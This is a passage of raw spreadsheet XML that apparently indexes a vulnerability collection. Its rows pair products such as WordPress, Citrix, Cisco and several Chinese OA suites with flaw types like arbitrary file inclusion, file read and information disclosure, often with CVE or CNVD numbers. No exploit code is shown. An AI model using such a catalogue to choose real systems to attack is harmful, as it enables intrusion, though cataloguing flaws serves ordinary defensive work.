      <c r="D426" s="2" t="str">
        <f t="shared" si="6"/>
        <v>MPSec ISG_任意文件包含</v>
      </c>
      <c r="E426" s="6" t="s">
        <v>1448</v>
      </c>
      <c r="F426" s="4" t="s">
        <v>1449</v>
      </c>
    </row>
    <row r="427" s="4" customFormat="1" spans="1:6">
      <c r="A427" s="2" t="s">
        <v>1450</v>
      </c>
      <c r="B427" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C427" s="2"/>
      <c r="D427" s="2" t="str">
        <f t="shared" si="6"/>
        <v>Management Console_任意文件包含</v>
      </c>
      <c r="E427" s="6" t="s">
        <v>1451</v>
      </c>
      <c r="F427" s="4" t="s">
        <v>1452</v>
      </c>
    </row>
    <row r="428" s="4" customFormat="1" spans="1:6">
      <c r="A428" s="2" t="s">
        <v>1453</v>
      </c>
      <c r="B428" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C428" s="2"/>
      <c r="D428" s="2" t="str">
        <f t="shared" si="6"/>
        <v>NS ASG_任意文件包含</v>
      </c>
      <c r="E428" s="6" t="s">
        <v>1454</v>
      </c>
      <c r="F428" s="4" t="s">
        <v>1455</v>
      </c>
    </row>
    <row r="429" s="4" customFormat="1" spans="1:6">
      <c r="A429" s="2" t="s">
        <v>1456</v>
      </c>
      <c r="B429" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C429" s="2"/>
      <c r="D429" s="2" t="str">
        <f t="shared" si="6"/>
        <v>Oliver Library Server_任意文件包含</v>
      </c>
      <c r="E429" s="6" t="s">
        <v>1457</v>
      </c>
      <c r="F429" s="4" t="s">
        <v>1458</v>
      </c>
    </row>
    <row r="430" s="4" customFormat="1" spans="1:6">
      <c r="A430" s="2" t="s">
        <v>1459</v>
      </c>
      <c r="B430" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C430" s="2"/>
      <c r="D430" s="2" t="str">
        <f t="shared" si="6"/>
        <v>OrbiTeam BSCW Server_任意文件包含</v>
      </c>
      <c r="E430" s="6" t="s">
        <v>1460</v>
      </c>
      <c r="F430" s="4" t="s">
        <v>1461</v>
      </c>
    </row>
    <row r="431" s="4" customFormat="1" spans="1:6">
      <c r="A431" s="2" t="s">
        <v>1462</v>
      </c>
      <c r="B431" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C431" s="2"/>
      <c r="D431" s="2" t="str">
        <f t="shared" si="6"/>
        <v>Surreal ToDo_任意文件包含</v>
      </c>
      <c r="E431" s="6" t="s">
        <v>1463</v>
      </c>
      <c r="F431" s="4" t="s">
        <v>1464</v>
      </c>
    </row>
    <row r="432" s="4" customFormat="1" spans="1:6">
      <c r="A432" s="2" t="s">
        <v>1465</v>
      </c>
      <c r="B432" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C432" s="2"/>
      <c r="D432" s="2" t="str">
        <f t="shared" si="6"/>
        <v>Symantec Messaging Gateway_任意文件包含</v>
      </c>
      <c r="E432" s="6" t="s">
        <v>1466</v>
      </c>
      <c r="F432" s="4" t="s">
        <v>1467</v>
      </c>
    </row>
    <row r="433" s="4" customFormat="1" spans="1:6">
      <c r="A433" s="2" t="s">
        <v>1468</v>
      </c>
      <c r="B433" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C433" s="2"/>
      <c r="D433" s="2" t="str">
        <f t="shared" si="6"/>
        <v>TPShop_任意文件包含</v>
      </c>
      <c r="E433" s="6" t="s">
        <v>1469</v>
      </c>
      <c r="F433" s="4" t="s">
        <v>1470</v>
      </c>
    </row>
    <row r="434" s="4" customFormat="1" spans="1:6">
      <c r="A434" s="2" t="s">
        <v>1471</v>
      </c>
      <c r="B434" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C434" s="2"/>
      <c r="D434" s="2" t="str">
        <f t="shared" si="6"/>
        <v>openSIS_任意文件包含</v>
      </c>
      <c r="E434" s="6" t="s">
        <v>1472</v>
      </c>
      <c r="F434" s="4" t="s">
        <v>1473</v>
      </c>
    </row>
    <row r="435" s="4" customFormat="1" spans="1:6">
      <c r="A435" s="2" t="s">
        <v>1474</v>
      </c>
      <c r="B435" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C435" s="2"/>
      <c r="D435" s="2" t="str">
        <f t="shared" si="6"/>
        <v>yishaadmin_任意文件包含</v>
      </c>
      <c r="E435" s="6" t="s">
        <v>1475</v>
      </c>
      <c r="F435" s="4" t="s">
        <v>1476</v>
      </c>
    </row>
    <row r="436" s="4" customFormat="1" spans="1:6">
      <c r="A436" s="2" t="s">
        <v>232</v>
      </c>
      <c r="B436" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C436" s="2"/>
      <c r="D436" s="2" t="str">
        <f t="shared" si="6"/>
        <v>致远OA_任意文件包含</v>
      </c>
      <c r="E436" s="6" t="s">
        <v>1477</v>
      </c>
      <c r="F436" s="4" t="s">
        <v>1478</v>
      </c>
    </row>
    <row r="437" s="4" customFormat="1" spans="1:6">
      <c r="A437" s="2" t="s">
        <v>1479</v>
      </c>
      <c r="B437" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C437" s="2"/>
      <c r="D437" s="2" t="str">
        <f t="shared" si="6"/>
        <v>SquirrelMail_任意文件包含</v>
      </c>
      <c r="E437" s="6" t="s">
        <v>1480</v>
      </c>
      <c r="F437" s="4" t="s">
        <v>1481</v>
      </c>
    </row>
    <row r="438" s="4" customFormat="1" spans="1:6">
      <c r="A438" s="2" t="s">
        <v>343</v>
      </c>
      <c r="B438" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C438" s="2"/>
      <c r="D438" s="2" t="str">
        <f t="shared" si="6"/>
        <v>VMware_任意文件包含</v>
      </c>
      <c r="E438" s="6" t="s">
        <v>1482</v>
      </c>
      <c r="F438" s="4" t="s">
        <v>1483</v>
      </c>
    </row>
    <row r="439" s="4" customFormat="1" spans="1:6">
      <c r="A439" s="2" t="s">
        <v>241</v>
      </c>
      <c r="B439" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C439" s="2"/>
      <c r="D439" s="2" t="str">
        <f t="shared" si="6"/>
        <v>泛微_任意文件包含</v>
      </c>
      <c r="E439" s="6" t="s">
        <v>1484</v>
      </c>
      <c r="F439" s="4" t="s">
        <v>1485</v>
      </c>
    </row>
    <row r="440" s="4" customFormat="1" spans="1:6">
      <c r="A440" s="2" t="s">
        <v>528</v>
      </c>
      <c r="B440" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C440" s="2"/>
      <c r="D440" s="2" t="str">
        <f t="shared" si="6"/>
        <v>Spring_任意文件包含</v>
      </c>
      <c r="E440" s="6" t="s">
        <v>1486</v>
      </c>
      <c r="F440" s="4" t="s">
        <v>1487</v>
      </c>
    </row>
    <row r="441" s="4" customFormat="1" spans="1:6">
      <c r="A441" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B441" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C441" s="2"/>
      <c r="D441" s="2" t="str">
        <f t="shared" si="6"/>
        <v>WordPress_任意文件包含</v>
      </c>
      <c r="E441" s="6" t="s">
        <v>1488</v>
      </c>
      <c r="F441" s="4" t="s">
        <v>1489</v>
      </c>
    </row>
    <row r="442" s="4" customFormat="1" spans="1:6">
      <c r="A442" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B442" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C442" s="2"/>
      <c r="D442" s="2" t="str">
        <f t="shared" si="6"/>
        <v>WordPress_任意文件包含</v>
      </c>
      <c r="E442" s="6" t="s">
        <v>1490</v>
      </c>
      <c r="F442" s="4" t="s">
        <v>1491</v>
      </c>
    </row>
    <row r="443" s="4" customFormat="1" spans="1:6">
      <c r="A443" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B443" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C443" s="2"/>
      <c r="D443" s="2" t="str">
        <f t="shared" si="6"/>
        <v>WordPress_任意文件包含</v>
      </c>
      <c r="E443" s="6" t="s">
        <v>1492</v>
      </c>
      <c r="F443" s="4" t="s">
        <v>1493</v>
      </c>
    </row>
    <row r="444" s="4" customFormat="1" spans="1:6">
      <c r="A444" s="2" t="s">
        <v>1494</v>
      </c>
      <c r="B444" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C444" s="2"/>
      <c r="D444" s="2" t="str">
        <f t="shared" si="6"/>
        <v>Wooyun_任意文件包含</v>
      </c>
      <c r="E444" s="6" t="s">
        <v>1495</v>
      </c>
      <c r="F444" s="4" t="s">
        <v>1496</v>
      </c>
    </row>
    <row r="445" s="4" customFormat="1" spans="1:6">
      <c r="A445" s="2" t="s">
        <v>1497</v>
      </c>
      <c r="B445" s="2" t="s">
        <v>1498</v>
      </c>
      <c r="C445" s="2" t="s">
        <v>1499</v>
      </c>
      <c r="D445" s="2" t="str">
        <f t="shared" si="6"/>
        <v>AceNet_任意文件下载_CNVD-2021-41972</v>
      </c>
      <c r="E445" s="6" t="s">
        <v>1500</v>
      </c>
      <c r="F445" s="4" t="s">
        <v>1501</v>
      </c>
    </row>
    <row r="446" s="4" customFormat="1" spans="1:6">
      <c r="A446" s="2" t="s">
        <v>1447</v>
      </c>
      <c r="B446" s="2" t="s">
        <v>1498</v>
      </c>
      <c r="C446" s="2" t="s">
        <v>1502</v>
      </c>
      <c r="D446" s="2" t="str">
        <f t="shared" si="6"/>
        <v>MPSec ISG_任意文件下载_CNVD-2021-43984</v>
      </c>
      <c r="E446" s="6" t="s">
        <v>1503</v>
      </c>
      <c r="F446" s="4" t="s">
        <v>1504</v>
      </c>
    </row>
    <row r="447" s="4" customFormat="1" spans="1:6">
      <c r="A447" s="2" t="s">
        <v>1505</v>
      </c>
      <c r="B447" s="2" t="s">
        <v>1498</v>
      </c>
      <c r="C447" s="2"/>
      <c r="D447" s="2" t="str">
        <f t="shared" si="6"/>
        <v>AVCON_任意文件下载</v>
      </c>
      <c r="E447" s="6" t="s">
        <v>1506</v>
      </c>
      <c r="F447" s="4" t="s">
        <v>1507</v>
      </c>
    </row>
    <row r="448" s="4" customFormat="1" spans="1:6">
      <c r="A448" s="2" t="s">
        <v>1508</v>
      </c>
      <c r="B448" s="2" t="s">
        <v>1509</v>
      </c>
      <c r="C448" s="2" t="s">
        <v>1510</v>
      </c>
      <c r="D448" s="2" t="str">
        <f t="shared" si="6"/>
        <v>Artica Pandora FMS_任意文件读取_CVE-2020-8497</v>
      </c>
      <c r="E448" s="6" t="s">
        <v>1511</v>
      </c>
      <c r="F448" s="4" t="s">
        <v>1512</v>
      </c>
    </row>
    <row r="449" s="4" customFormat="1" spans="1:6">
      <c r="A449" s="2" t="s">
        <v>1227</v>
      </c>
      <c r="B449" s="2" t="s">
        <v>1509</v>
      </c>
      <c r="C449" s="2" t="s">
        <v>1513</v>
      </c>
      <c r="D449" s="2" t="str">
        <f t="shared" si="6"/>
        <v>Citrix_任意文件读取_CVE-2020-8982</v>
      </c>
      <c r="E449" s="6" t="s">
        <v>1514</v>
      </c>
      <c r="F449" s="4" t="s">
        <v>1515</v>
      </c>
    </row>
    <row r="450" s="4" customFormat="1" spans="1:6">
      <c r="A450" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B450" s="2" t="s">
        <v>1509</v>
      </c>
      <c r="C450" s="2" t="s">
        <v>1516</v>
      </c>
      <c r="D450" s="2" t="str">
        <f t="shared" ref="D450:D513" si="7">_xlfn.TEXTJOIN("_",TRUE,A450:C450)</f>
        <v>WordPress_任意文件读取_CVE-2022-33901</v>
      </c>
      <c r="E450" s="6" t="s">
        <v>1517</v>
      </c>
      <c r="F450" s="4" t="s">
        <v>1518</v>
      </c>
    </row>
    <row r="451" s="4" customFormat="1" spans="1:6">
      <c r="A451" s="2" t="s">
        <v>1519</v>
      </c>
      <c r="B451" s="2" t="s">
        <v>1509</v>
      </c>
      <c r="C451" s="2" t="s">
        <v>1520</v>
      </c>
      <c r="D451" s="2" t="str">
        <f t="shared" si="7"/>
        <v>Lightdash_任意文件读取_CVE-2023-35844</v>
      </c>
      <c r="E451" s="6" t="s">
        <v>1521</v>
      </c>
      <c r="F451" s="4" t="s">
        <v>1522</v>
      </c>
    </row>
    <row r="452" s="4" customFormat="1" spans="1:6">
      <c r="A452" s="2" t="s">
        <v>1523</v>
      </c>
      <c r="B452" s="2" t="s">
        <v>1509</v>
      </c>
      <c r="C452" s="2" t="s">
        <v>1524</v>
      </c>
      <c r="D452" s="2" t="str">
        <f t="shared" si="7"/>
        <v>Adobe ColdFusion_任意文件读取_CVE-2024-20767</v>
      </c>
      <c r="E452" s="6" t="s">
        <v>1525</v>
      </c>
      <c r="F452" s="4" t="s">
        <v>1526</v>
      </c>
    </row>
    <row r="453" s="4" customFormat="1" spans="1:6">
      <c r="A453" s="2" t="s">
        <v>1527</v>
      </c>
      <c r="B453" s="2" t="s">
        <v>1509</v>
      </c>
      <c r="C453" s="2" t="s">
        <v>1528</v>
      </c>
      <c r="D453" s="2" t="str">
        <f t="shared" si="7"/>
        <v>Bazarr_任意文件读取_CVE-2024-40348</v>
      </c>
      <c r="E453" s="6" t="s">
        <v>1529</v>
      </c>
      <c r="F453" s="4" t="s">
        <v>1530</v>
      </c>
    </row>
    <row r="454" s="4" customFormat="1" spans="1:6">
      <c r="A454" s="2" t="s">
        <v>1531</v>
      </c>
      <c r="B454" s="2" t="s">
        <v>1509</v>
      </c>
      <c r="C454" s="2" t="s">
        <v>1532</v>
      </c>
      <c r="D454" s="2" t="str">
        <f t="shared" si="7"/>
        <v>Reposilite_任意文件读取_CVE-2024-36117</v>
      </c>
      <c r="E454" s="6" t="s">
        <v>1533</v>
      </c>
      <c r="F454" s="4" t="s">
        <v>1534</v>
      </c>
    </row>
    <row r="455" s="4" customFormat="1" spans="1:6">
      <c r="A455" s="2" t="s">
        <v>1535</v>
      </c>
      <c r="B455" s="2" t="s">
        <v>1509</v>
      </c>
      <c r="C455" s="2" t="s">
        <v>1536</v>
      </c>
      <c r="D455" s="2" t="str">
        <f t="shared" si="7"/>
        <v>Pichome_任意文件读取_CVE-2025-1743</v>
      </c>
      <c r="E455" s="6" t="s">
        <v>1537</v>
      </c>
      <c r="F455" s="4" t="s">
        <v>1538</v>
      </c>
    </row>
    <row r="456" s="4" customFormat="1" spans="1:6">
      <c r="A456" s="2" t="s">
        <v>1539</v>
      </c>
      <c r="B456" s="2" t="s">
        <v>1509</v>
      </c>
      <c r="C456" s="2"/>
      <c r="D456" s="2" t="str">
        <f t="shared" si="7"/>
        <v>HCM Cloud_任意文件读取</v>
      </c>
      <c r="E456" s="6" t="s">
        <v>1540</v>
      </c>
      <c r="F456" s="4" t="s">
        <v>1541</v>
      </c>
    </row>
    <row r="457" s="4" customFormat="1" spans="1:6">
      <c r="A457" s="2" t="s">
        <v>1542</v>
      </c>
      <c r="B457" s="2" t="s">
        <v>1509</v>
      </c>
      <c r="C457" s="2"/>
      <c r="D457" s="2" t="str">
        <f t="shared" si="7"/>
        <v>IDoc View_任意文件读取</v>
      </c>
      <c r="E457" s="6" t="s">
        <v>1543</v>
      </c>
      <c r="F457" s="4" t="s">
        <v>1544</v>
      </c>
    </row>
    <row r="458" s="4" customFormat="1" spans="1:6">
      <c r="A458" s="2" t="s">
        <v>1545</v>
      </c>
      <c r="B458" s="2" t="s">
        <v>1509</v>
      </c>
      <c r="C458" s="2"/>
      <c r="D458" s="2" t="str">
        <f t="shared" si="7"/>
        <v>Jinhe OA_任意文件读取</v>
      </c>
      <c r="E458" s="6" t="s">
        <v>1546</v>
      </c>
      <c r="F458" s="4" t="s">
        <v>1547</v>
      </c>
    </row>
    <row r="459" s="4" customFormat="1" spans="1:6">
      <c r="A459" s="2" t="s">
        <v>1548</v>
      </c>
      <c r="B459" s="2" t="s">
        <v>1509</v>
      </c>
      <c r="C459" s="2"/>
      <c r="D459" s="2" t="str">
        <f t="shared" si="7"/>
        <v>Crocus system Service_任意文件读取</v>
      </c>
      <c r="E459" s="6" t="s">
        <v>1549</v>
      </c>
      <c r="F459" s="4" t="s">
        <v>1550</v>
      </c>
    </row>
    <row r="460" s="4" customFormat="1" spans="1:6">
      <c r="A460" s="2" t="s">
        <v>1551</v>
      </c>
      <c r="B460" s="2" t="s">
        <v>1509</v>
      </c>
      <c r="C460" s="2"/>
      <c r="D460" s="2" t="str">
        <f t="shared" si="7"/>
        <v>红帆_任意文件读取</v>
      </c>
      <c r="E460" s="6" t="s">
        <v>1552</v>
      </c>
      <c r="F460" s="4" t="s">
        <v>1553</v>
      </c>
    </row>
    <row r="461" s="4" customFormat="1" spans="1:6">
      <c r="A461" s="2" t="s">
        <v>1554</v>
      </c>
      <c r="B461" s="2" t="s">
        <v>1509</v>
      </c>
      <c r="C461" s="2"/>
      <c r="D461" s="2" t="str">
        <f t="shared" si="7"/>
        <v>LiveBOS ShowImage_任意文件读取</v>
      </c>
      <c r="E461" s="6" t="s">
        <v>1555</v>
      </c>
      <c r="F461" s="4" t="s">
        <v>1556</v>
      </c>
    </row>
    <row r="462" s="4" customFormat="1" spans="1:6">
      <c r="A462" s="2" t="s">
        <v>1557</v>
      </c>
      <c r="B462" s="2" t="s">
        <v>1509</v>
      </c>
      <c r="C462" s="2"/>
      <c r="D462" s="2" t="str">
        <f t="shared" si="7"/>
        <v>Nsfocus_任意文件读取</v>
      </c>
      <c r="E462" s="6" t="s">
        <v>1558</v>
      </c>
      <c r="F462" s="4" t="s">
        <v>1559</v>
      </c>
    </row>
    <row r="463" s="4" customFormat="1" spans="1:6">
      <c r="A463" s="2" t="s">
        <v>1560</v>
      </c>
      <c r="B463" s="2" t="s">
        <v>1509</v>
      </c>
      <c r="C463" s="2"/>
      <c r="D463" s="2" t="str">
        <f t="shared" si="7"/>
        <v>Laravel_任意文件读取</v>
      </c>
      <c r="E463" s="6" t="s">
        <v>1561</v>
      </c>
      <c r="F463" s="4" t="s">
        <v>1562</v>
      </c>
    </row>
    <row r="464" s="4" customFormat="1" spans="1:6">
      <c r="A464" s="2" t="s">
        <v>631</v>
      </c>
      <c r="B464" s="2" t="s">
        <v>1509</v>
      </c>
      <c r="C464" s="2"/>
      <c r="D464" s="2" t="str">
        <f t="shared" si="7"/>
        <v>通达OA_任意文件读取</v>
      </c>
      <c r="E464" s="6" t="s">
        <v>1563</v>
      </c>
      <c r="F464" s="4" t="s">
        <v>1564</v>
      </c>
    </row>
    <row r="465" s="4" customFormat="1" spans="1:6">
      <c r="A465" s="2" t="s">
        <v>1565</v>
      </c>
      <c r="B465" s="2" t="s">
        <v>1509</v>
      </c>
      <c r="C465" s="2"/>
      <c r="D465" s="2" t="str">
        <f t="shared" si="7"/>
        <v>万户_任意文件读取</v>
      </c>
      <c r="E465" s="6" t="s">
        <v>1566</v>
      </c>
      <c r="F465" s="4" t="s">
        <v>1567</v>
      </c>
    </row>
    <row r="466" s="4" customFormat="1" spans="1:6">
      <c r="A466" s="2" t="s">
        <v>1565</v>
      </c>
      <c r="B466" s="2" t="s">
        <v>1509</v>
      </c>
      <c r="C466" s="2"/>
      <c r="D466" s="2" t="str">
        <f t="shared" si="7"/>
        <v>万户_任意文件读取</v>
      </c>
      <c r="E466" s="6" t="s">
        <v>1568</v>
      </c>
      <c r="F466" s="4" t="s">
        <v>1569</v>
      </c>
    </row>
    <row r="467" s="4" customFormat="1" spans="1:6">
      <c r="A467" s="2" t="s">
        <v>1570</v>
      </c>
      <c r="B467" s="2" t="s">
        <v>1509</v>
      </c>
      <c r="C467" s="2"/>
      <c r="D467" s="2" t="str">
        <f t="shared" si="7"/>
        <v>Ninja Tables_任意文件读取</v>
      </c>
      <c r="E467" s="6" t="s">
        <v>1571</v>
      </c>
      <c r="F467" s="4" t="s">
        <v>1572</v>
      </c>
    </row>
    <row r="468" s="4" customFormat="1" spans="1:6">
      <c r="A468" s="2" t="s">
        <v>1573</v>
      </c>
      <c r="B468" s="2" t="s">
        <v>1509</v>
      </c>
      <c r="C468" s="2"/>
      <c r="D468" s="2" t="str">
        <f t="shared" si="7"/>
        <v>Chanjet TPlus DownloadProxy_任意文件读取</v>
      </c>
      <c r="E468" s="6" t="s">
        <v>1574</v>
      </c>
      <c r="F468" s="4" t="s">
        <v>1575</v>
      </c>
    </row>
    <row r="469" s="4" customFormat="1" spans="1:6">
      <c r="A469" s="2" t="s">
        <v>248</v>
      </c>
      <c r="B469" s="2" t="s">
        <v>1509</v>
      </c>
      <c r="C469" s="2"/>
      <c r="D469" s="2" t="str">
        <f t="shared" si="7"/>
        <v>用友_任意文件读取</v>
      </c>
      <c r="E469" s="6" t="s">
        <v>1576</v>
      </c>
      <c r="F469" s="4" t="s">
        <v>1577</v>
      </c>
    </row>
    <row r="470" s="4" customFormat="1" spans="1:6">
      <c r="A470" s="2" t="s">
        <v>1578</v>
      </c>
      <c r="B470" s="2" t="s">
        <v>1509</v>
      </c>
      <c r="C470" s="2"/>
      <c r="D470" s="2" t="str">
        <f t="shared" si="7"/>
        <v>YonBIP_任意文件读取</v>
      </c>
      <c r="E470" s="6" t="s">
        <v>1579</v>
      </c>
      <c r="F470" s="4" t="s">
        <v>1580</v>
      </c>
    </row>
    <row r="471" s="4" customFormat="1" spans="1:6">
      <c r="A471" s="2" t="s">
        <v>1581</v>
      </c>
      <c r="B471" s="2" t="s">
        <v>1582</v>
      </c>
      <c r="C471" s="2" t="s">
        <v>1583</v>
      </c>
      <c r="D471" s="2" t="str">
        <f t="shared" si="7"/>
        <v>锐捷_信息泄露_CNVD-2021-17369</v>
      </c>
      <c r="E471" s="6" t="s">
        <v>1584</v>
      </c>
      <c r="F471" s="4" t="s">
        <v>1585</v>
      </c>
    </row>
    <row r="472" s="4" customFormat="1" spans="1:6">
      <c r="A472" s="2" t="s">
        <v>1586</v>
      </c>
      <c r="B472" s="2" t="s">
        <v>1582</v>
      </c>
      <c r="C472" s="2" t="s">
        <v>1587</v>
      </c>
      <c r="D472" s="2" t="str">
        <f t="shared" si="7"/>
        <v>Atlassian Confluence_信息泄露_CVE-2015-8399</v>
      </c>
      <c r="E472" s="6" t="s">
        <v>1588</v>
      </c>
      <c r="F472" s="4" t="s">
        <v>1589</v>
      </c>
    </row>
    <row r="473" s="4" customFormat="1" spans="1:6">
      <c r="A473" s="2" t="s">
        <v>1590</v>
      </c>
      <c r="B473" s="2" t="s">
        <v>1582</v>
      </c>
      <c r="C473" s="2" t="s">
        <v>1591</v>
      </c>
      <c r="D473" s="2" t="str">
        <f t="shared" si="7"/>
        <v>DataTaker DT dEX_信息泄露_CVE-2017-11165</v>
      </c>
      <c r="E473" s="6" t="s">
        <v>1592</v>
      </c>
      <c r="F473" s="4" t="s">
        <v>1593</v>
      </c>
    </row>
    <row r="474" s="4" customFormat="1" spans="1:6">
      <c r="A474" s="2" t="s">
        <v>721</v>
      </c>
      <c r="B474" s="2" t="s">
        <v>1582</v>
      </c>
      <c r="C474" s="2" t="s">
        <v>1594</v>
      </c>
      <c r="D474" s="2" t="str">
        <f t="shared" si="7"/>
        <v>Cisco_信息泄露_CVE-2018-0127</v>
      </c>
      <c r="E474" s="6" t="s">
        <v>1595</v>
      </c>
      <c r="F474" s="4" t="s">
        <v>1596</v>
      </c>
    </row>
    <row r="475" s="4" customFormat="1" spans="1:6">
      <c r="A475" s="2" t="s">
        <v>1597</v>
      </c>
      <c r="B475" s="2" t="s">
        <v>1582</v>
      </c>
      <c r="C475" s="2" t="s">
        <v>1598</v>
      </c>
      <c r="D475" s="2" t="str">
        <f t="shared" si="7"/>
        <v>Splunk_信息泄露_CVE-2018-11409</v>
      </c>
      <c r="E475" s="6" t="s">
        <v>1599</v>
      </c>
      <c r="F475" s="4" t="s">
        <v>1600</v>
      </c>
    </row>
    <row r="476" s="4" customFormat="1" spans="1:6">
      <c r="A476" s="2" t="s">
        <v>721</v>
      </c>
      <c r="B476" s="2" t="s">
        <v>1582</v>
      </c>
      <c r="C476" s="2" t="s">
        <v>1601</v>
      </c>
      <c r="D476" s="2" t="str">
        <f t="shared" si="7"/>
        <v>Cisco_信息泄露_CVE-2019-1653</v>
      </c>
      <c r="E476" s="6" t="s">
        <v>1602</v>
      </c>
      <c r="F476" s="4" t="s">
        <v>1603</v>
      </c>
    </row>
    <row r="477" s="4" customFormat="1" spans="1:6">
      <c r="A477" s="2" t="s">
        <v>1604</v>
      </c>
      <c r="B477" s="2" t="s">
        <v>1582</v>
      </c>
      <c r="C477" s="2" t="s">
        <v>1605</v>
      </c>
      <c r="D477" s="2" t="str">
        <f t="shared" si="7"/>
        <v>Jira_信息泄露_CVE-2019-8449</v>
      </c>
      <c r="E477" s="6" t="s">
        <v>1606</v>
      </c>
      <c r="F477" s="4" t="s">
        <v>1607</v>
      </c>
    </row>
    <row r="478" s="4" customFormat="1" spans="1:6">
      <c r="A478" s="2" t="s">
        <v>1608</v>
      </c>
      <c r="B478" s="2" t="s">
        <v>1582</v>
      </c>
      <c r="C478" s="2" t="s">
        <v>1609</v>
      </c>
      <c r="D478" s="2" t="str">
        <f t="shared" si="7"/>
        <v>Kirona Dynamic Resource Scheduler_信息泄露_CVE-2019-17503</v>
      </c>
      <c r="E478" s="6" t="s">
        <v>1610</v>
      </c>
      <c r="F478" s="4" t="s">
        <v>1611</v>
      </c>
    </row>
    <row r="479" s="4" customFormat="1" spans="1:6">
      <c r="A479" s="2" t="s">
        <v>1612</v>
      </c>
      <c r="B479" s="2" t="s">
        <v>1582</v>
      </c>
      <c r="C479" s="2" t="s">
        <v>1613</v>
      </c>
      <c r="D479" s="2" t="str">
        <f t="shared" si="7"/>
        <v>AfterLogic Aurora and WebMail Pro_信息泄露_CVE-2021-26294</v>
      </c>
      <c r="E479" s="6" t="s">
        <v>1614</v>
      </c>
      <c r="F479" s="4" t="s">
        <v>1615</v>
      </c>
    </row>
    <row r="480" s="4" customFormat="1" spans="1:6">
      <c r="A480" s="2" t="s">
        <v>1616</v>
      </c>
      <c r="B480" s="2" t="s">
        <v>1582</v>
      </c>
      <c r="C480" s="2" t="s">
        <v>1617</v>
      </c>
      <c r="D480" s="2" t="str">
        <f t="shared" si="7"/>
        <v>Akkadian Provisioning Manager_信息泄露_CVE-2021-31581</v>
      </c>
      <c r="E480" s="6" t="s">
        <v>1618</v>
      </c>
      <c r="F480" s="4" t="s">
        <v>1619</v>
      </c>
    </row>
    <row r="481" s="4" customFormat="1" spans="1:6">
      <c r="A481" s="2" t="s">
        <v>1620</v>
      </c>
      <c r="B481" s="2" t="s">
        <v>1582</v>
      </c>
      <c r="C481" s="2" t="s">
        <v>1621</v>
      </c>
      <c r="D481" s="2" t="str">
        <f t="shared" si="7"/>
        <v>Hongdian H_信息泄露_CVE-2021-28150</v>
      </c>
      <c r="E481" s="6" t="s">
        <v>1622</v>
      </c>
      <c r="F481" s="4" t="s">
        <v>1623</v>
      </c>
    </row>
    <row r="482" s="4" customFormat="1" spans="1:6">
      <c r="A482" s="2" t="s">
        <v>1624</v>
      </c>
      <c r="B482" s="2" t="s">
        <v>1582</v>
      </c>
      <c r="C482" s="2" t="s">
        <v>1625</v>
      </c>
      <c r="D482" s="2" t="str">
        <f t="shared" si="7"/>
        <v>Reolink E Zoom Camera_信息泄露_CVE-2021-40150</v>
      </c>
      <c r="E482" s="6" t="s">
        <v>1626</v>
      </c>
      <c r="F482" s="4" t="s">
        <v>1627</v>
      </c>
    </row>
    <row r="483" s="4" customFormat="1" spans="1:6">
      <c r="A483" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B483" s="2" t="s">
        <v>1582</v>
      </c>
      <c r="C483" s="2" t="s">
        <v>1628</v>
      </c>
      <c r="D483" s="2" t="str">
        <f t="shared" si="7"/>
        <v>WordPress_信息泄露_CVE-2021-24997</v>
      </c>
      <c r="E483" s="6" t="s">
        <v>1629</v>
      </c>
      <c r="F483" s="4" t="s">
        <v>1630</v>
      </c>
    </row>
    <row r="484" s="4" customFormat="1" spans="1:6">
      <c r="A484" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B484" s="2" t="s">
        <v>1582</v>
      </c>
      <c r="C484" s="2" t="s">
        <v>1631</v>
      </c>
      <c r="D484" s="2" t="str">
        <f t="shared" si="7"/>
        <v>WordPress_信息泄露_CVE-2021-24146</v>
      </c>
      <c r="E484" s="6" t="s">
        <v>1632</v>
      </c>
      <c r="F484" s="4" t="s">
        <v>1633</v>
      </c>
    </row>
    <row r="485" s="4" customFormat="1" spans="1:6">
      <c r="A485" s="2" t="s">
        <v>1634</v>
      </c>
      <c r="B485" s="2" t="s">
        <v>1582</v>
      </c>
      <c r="C485" s="2" t="s">
        <v>1635</v>
      </c>
      <c r="D485" s="2" t="str">
        <f t="shared" si="7"/>
        <v>AmetysCMS_信息泄露_CVE-2022-26159</v>
      </c>
      <c r="E485" s="6" t="s">
        <v>1636</v>
      </c>
      <c r="F485" s="4" t="s">
        <v>1637</v>
      </c>
    </row>
    <row r="486" s="4" customFormat="1" spans="1:6">
      <c r="A486" s="2" t="s">
        <v>1638</v>
      </c>
      <c r="B486" s="2" t="s">
        <v>1582</v>
      </c>
      <c r="C486" s="2" t="s">
        <v>1639</v>
      </c>
      <c r="D486" s="2" t="str">
        <f t="shared" si="7"/>
        <v>Wavlink WL_信息泄露_CVE-2022-48164</v>
      </c>
      <c r="E486" s="6" t="s">
        <v>1640</v>
      </c>
      <c r="F486" s="4" t="s">
        <v>1641</v>
      </c>
    </row>
    <row r="487" s="4" customFormat="1" spans="1:6">
      <c r="A487" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B487" s="2" t="s">
        <v>1582</v>
      </c>
      <c r="C487" s="2" t="s">
        <v>1642</v>
      </c>
      <c r="D487" s="2" t="str">
        <f t="shared" si="7"/>
        <v>WordPress_信息泄露_CVE-2022-2376</v>
      </c>
      <c r="E487" s="6" t="s">
        <v>1643</v>
      </c>
      <c r="F487" s="4" t="s">
